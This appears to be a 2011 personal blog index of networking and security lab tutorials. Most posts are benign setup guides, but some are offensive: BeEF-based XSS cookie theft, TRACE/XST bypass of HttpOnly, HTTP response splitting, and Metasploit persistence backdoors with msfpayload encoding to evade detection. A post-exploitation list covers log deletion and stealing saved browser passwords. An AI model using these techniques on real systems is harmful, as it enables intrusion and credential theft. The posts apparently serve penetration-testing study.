Showing posts from 2011

Microsoft CA lab

Microsoft windows CA lab:
CA Workgroup:

CA Domain:

Raise DC:



Network Monitor:

Thanks for reading
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

5 step to create Window with windows API use C

5 steps:
1. Initialzate class
2. Resgister class
3. Create window
4. Receive message from WinProc
5. Translate message and dispatch it

Step 1: Initialzate class
I like way use:
const char g_szClassName[] = "myWindowClass"; Step 2: Registering the Window Class

In WinMain() function:
wc.cbSize        = sizeof(WNDCLASSEX);         = 0;
wc.lpfnWndProc   = WndProc;
wc.cbClsExtra    = 0;
wc.cbWndExtra    = 0;
wc.hInstance     = hInstance;
wc.hIcon         = LoadIcon(NULL, IDI_APPLICATION);
wc.hCursor       = LoadCursor(NULL, IDC_ARROW);
wc.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wc.lpszMenuName  = NULL;
wc.lpszClassName = g_szClassName;
wc.hIconSm       = LoadIcon(NULL, IDI_APPLICATION);

    MessageBox(NULL, "Window Registration Failed!", "Error!",
    return 0;
} Step 3: Creating the Window
Use CreateWindowEx() function …

Checkpoint Policy

Public http and ftp:

Proventia through Checkpoint:

Server sensor through checkpoint:

Thanks for reading
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

Install Solaris

Thanks to thuynguyenkim record and edit video :))

Thanks for reading
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

Checkpoint VPN

VPN client to site:
SmartConsole config:

Client config and test:

VPN site to site:

VPN HCM and test:

Thanks for reading
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

XSS beef framework

XSS are executed on the client-side. You can use javascript, DOM to steal data, cookie, deface....
I tried many times with javascript, but i found beef, XSS framework. One work: include script and send malicous code to victim:
If XSS in POST request, you can create page, it will generate POST request:

Thanks for reading
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

TRACE method with XST

TRACE method.
Today, i will presente one solution. TRACE method. We known many HTTP reports: GET POST OPTION...
But we will focus one method: TRACE. If we use it, it will give copy of our request:
icesurfer@nightblade ~ $ nc 80

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 31 Oct 2006 08:01:48 GMT
Connection: close
Content-Type: message/http
Content-Length: 39

Now, i am goting to talk about: httponly. It is one mechanism to protect cookie. HttpOnly is an additional flag included in a Set-Cookie HTTP response header. f the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be accessed through client side script.
So, we can use it to prevent XSS attack. But if server support TRACE method, we will east bypass it.

Now, we must review before example. TRACE method will give me all all request, that mean we will access cookie, which was tagged httponly. Remember …

HTTP cache poisioning

HTTP response spilitting

First, we watch one source code:
$ cat redir.php
header ("Location: " . $_GET['page']);

"page" argument will be got from end-user and redirect (302) to another page. Ex:


Now, we will talk about http request. In normally, if you request redir.php?page=test.html, http request like that:
GET http://localhost/redir.php?site=test.html
Host: localhost
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

We will go to test.html. Notice to "page" variable. It is not filtered. So end-user can modify it.
Using CR (%0d) and LF (%0a), attacker can control http request, generate two response to one request. How to do that?

this is page variable:
The resulting answer from the vulnerable application:
HTTP/1.1 302 Moved Temporari…

Install windows 3.1

First OS i had beend used :)).

Thanks for reading
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

Metasploit Backdoor Tutorial

Create persistence backdoor
Can be configured to connect back on systemboot or user login
Time can be set between connect back attemps
Under the hood
    Create vbs file on the victim and excute it
    Add registry entries so it is autorun
Can be uninstalled remotely
    Vbs file delete manually
meterpreter > run persistence
meterpreter > run persistence -A -U -i 10 -p 3000 -r

Metsvc backdoor
Run as service on the victim
Connect to it remotely
    No authentication required
Can be remotely unintalled
    File need delete manually
Less noisy compared to persistence
    Attacker can connect when he wants
Can be found by portscaning
Demo: Backdoor with Metsvc

Create Executable from payloads
Use: msfpayload [var=val] [S]umamry|[C]|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecuate|[D]ll|[V]BA|[W]ar;
msfpayload windows/meterprete/bind_tcp RHOST= X | bind_tcp.exe
Encoding to obfucate payload
Encode payload to eavde detection
Encode payloa…

Endian- VPN client to site (Host to network)

One friend ask me about it. I recognize many company in Vietnam like using Endian. But flow me, i like Vyatta more, because i like denial using routing. :))
That is simple to config it, if you had some experience about openvpn. Endian use openvpn for vpnserver.
And you will notice about client config, there are:
dev tap : for DHCP service
ca endian.pem : ca cert, not use client cert like ipcop
remote endian IP or hostname : of coure
auth-user-pass : user and password which were created.


Thanks for reading
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

Metasploit, stealing data, get saved password and sniffing password

My friend asked me: what will you do after exploit. So i answered: privilege escalation, or stealing data. I have some advices for : Phases of Post-exploitation
1. Understanding the Victim better
2. Privilege Escalation
3. Deleting Log and Kill Monitoring software
4. Collecting Data, excuting Programs
    Search for a file
    Download files
    Download resgistry
    Download application data
        Browser password/sessions
5. Backdoors and Rootkits
6. Using victim as Pirvot to hack deeper into the network 
I maded one video demo it: Using metasploit to stealing data and get firefox saved password:

<p><p><p> </p></p></p>


Install l7-filter module for Iptables

To use menuconfig:
yum install -y ncurses-develDownload required packages
Download L7-filter kernel
Download L7-filter Protocol definitions
wget definitions/2009-05-28/l7-protocols-2009-05-28.tar.gzDownload Linux Iptables 1.4.0
wget Linux Kernel 2.6.26
wget it:
tar xvf linux-2.6.26.tar.bz2
tar xvf netfilter-layer7-v2.19.tar.gz Apply patch to Linux kernel source
cd linux-2.6.26
patch -p1 < ../netfilter-layer7-v2.19/kernel-2.6.25-layer7-2.19.patch
Apply patch & install iptables 1.4.0
tar -xvf iptables-1.4.0.tar.bz2
cd iptables-1.4.0
patch -p1 < ../netfilter-layer7-v2.19/iptables-1.4-for-kernel-2.6.20forward-layer7-2.19.patch
chmod +x extensions/.layer7-test=== modified file 'extensions/libxt…

OpenCA tutorial

Install OpenCA tutorial

#yum install -y openssl-devel db4 db4-devel mysql-server mysql-devel perl-XML-Parser httpd
# rpm -Uvh openca-tools-1.3.0-1.el5.i386.rpm
# tar xvf openca-base-1.1.1.tar.gz
# cd openca-base-1.1.1
# mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.77 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> create database openca;
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON *.* TO 'openca'@'localhost' IDENTIFIED BY '123456';
Query OK, 0 rows affected (0.00 sec)

# mysql -u openca -p

./configure --prefix=/opt/openca \
                 --with-ca-organization="HBN CA Labs" \
                 --with-httpd-fs-prefix=/var/www \
                 --with-httpd-main-dir=pki \
                 --with-db-name=openca \
                 --with-db-host=localhost \

Install Solaris 10 - Tutorial by images

One note: Set Vmware at least 580mb of Ram. 539 mb if you install in text mode, 780 if you use graphic mode.

Install Redhat Enterprise - Graphic mode

Many people very hard to start learning Linux. In the past, i spent 1 year but can not install Linux :)).
So I write detail tutorial by images to help any people who need it.
First, you must have Redhat ISO. You can burn it to CD or USB stick. Then, config BIOS to boot it. After that, you can start install. It is boot windows:
Enter to start ( Graphic mode) If you type text, you will use text mode
Skip to ingnore test CD
Start Graphic mode
Chose Language: English
Chose keyboard: English
 Type your serial number: